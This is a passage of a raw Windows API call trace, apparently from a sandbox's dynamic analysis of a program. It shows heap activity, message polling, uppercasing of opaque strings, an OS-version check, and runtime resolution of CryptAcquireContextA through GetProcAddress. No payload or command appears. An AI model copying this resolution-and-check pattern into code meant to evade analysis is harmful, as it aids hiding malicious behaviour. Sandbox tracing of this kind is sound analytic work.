lpMsg=0x8bf4b0) returned 0 [0198.637] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0198.637] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0198.637] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0198.637] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0198.638] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa218 [0198.638] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0198.638] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24b30f8 [0198.638] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0198.638] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0198.638] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0198.638] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0198.638] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa0b0 [0198.638] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0198.638] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0198.638] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9b70 [0198.638] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0198.638] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa098 [0198.638] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0198.638] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1758 [0198.638] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0198.638] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b30f8 | out: hHeap=0x25c0000) returned 1 [0198.638] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0198.638] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0198.638] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0198.638] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0198.638] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0198.639] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa218 | out: hHeap=0x25c0000) returned 1 [0198.639] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0198.639] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0198.639] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0198.639] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0198.639] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0198.639] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_7", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0198.639] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0198.639] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0198.639] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa098 | out: hHeap=0x25c0000) returned 1 [0198.639] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0198.639] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0198.639] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0198.639] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0198.639] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0198.639] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0198.639] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0198.639] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa098 [0198.639] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0198.639] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a80 [0198.639] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1758 [0198.639] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0198.640] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a80 | out: hHeap=0x25c0000) returned 1 [0198.640] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0198.640] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa8c0 [0198.640] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0198.640] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0198.640] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0198.640] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0198.640] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0198.640] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa218 [0198.640] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0198.640] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0198.640] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0198.640] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18c8 [0198.640] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a80 [0198.640] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0198.640] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a80 | out: hHeap=0x25c0000) returned 1 [0198.640] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0198.640] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0198.640] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa218 | out: hHeap=0x25c0000) returned 1 [0198.640] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0198.640] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0198.640] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0198.640] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0198.641] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0198.641] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0198.641] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0198.641] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0198.641] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0198.641] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0198.641] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa218 [0198.641] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0198.641] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0198.641] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0198.641] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0198.641] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa218 | out: hHeap=0x25c0000) returned 1 [0198.641] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0198.641] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0198.641] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0198.641] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0198.641] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0198.641] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0198.641] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0198.641] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0198.641] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0198.642] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0198.642] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa218 [0198.642] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0198.642] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0198.642] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0198.642] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0198.642] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0198.642] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0198.642] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0198.642] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0198.642] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0198.642] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0198.642] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0198.642] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0198.642] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0198.642] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0198.642] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0198.642] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0198.642] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0198.642] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0198.643] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0198.643] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a80 | out: hHeap=0x25c0000) returned 1 [0198.643] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0198.643] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0198.643] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0198.643] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0198.643] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0198.643] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0198.643] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0198.643] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0198.643] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0198.643] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0198.643] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0198.643] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0198.643] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0198.643] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0198.643] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0198.643] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0198.644] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0198.644] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0198.644] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0198.644] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0198.644] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0198.644] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0198.644] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0198.644] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0198.644] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0198.644] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0198.644] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0198.644] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0198.644] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0198.644] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0198.644] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0198.644] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0198.644] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0198.644] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0198.644] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0198.644] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0198.645] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x2466df0, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0198.645] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0198.645] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0198.645] GetProcAddress (hModule=0x74d40000, lpProcName="CryptAcquireContext") returned 0x0 [0198.645] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0198.645] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0198.645] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0198.645] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x2466df0, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0198.645] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0198.645] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0198.645] GetProcAddress (hModule=0x74d40000, lpProcName="CryptAcquireContextA") returned 0x74d491dd [0198.645] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0198.645] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0198.646] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3688 | out: hHeap=0x25c0000) returned 1 [0198.646] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0198.646] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0198.646] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0198.646] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0198.646] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0198.646] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0198.646] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0198.646] CryptAcquireContextA (in: phProv=0x8befe0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8befe0*=0xad6480) returned 1 [0198.647] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0198.647] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0198.647] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0198.647] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0198.647] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0198.647] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0198.647] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0198.647] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0198.647] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0198.647] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0198.647] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0198.647] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0198.647] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0198.647] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0198.647] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0198.648] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0198.648] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0198.648] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0198.648] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0198.648] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0198.648] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0198.648] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0198.648] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0198.648] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a80 | out: hHeap=0x25c0000) returned 1 [0198.648] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0198.648] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0198.648] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa098 | out: hHeap=0x25c0000) returned 1 [0198.648] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0198.648] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0198.648] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0198.648] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0198.648] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0198.648] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0198.648] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0198.648] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0198.648] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0198.648] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0198.649] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0198.649] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a80 [0198.649] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1858 [0198.649] CharUpperBuffW (in: lpsz="A1300D00639", cchLength=0xb | out: lpsz="A1300D00639") returned 0xb [0198.649] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0198.649] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0198.649] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0198.649] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0198.649] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0198.649] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0198.649] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0198.649] CharUpperBuffW (in: lpsz="SSA1300D00639", cchLength=0xd | out: lpsz="SSA1300D00639") returned 0xd [0198.649] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, 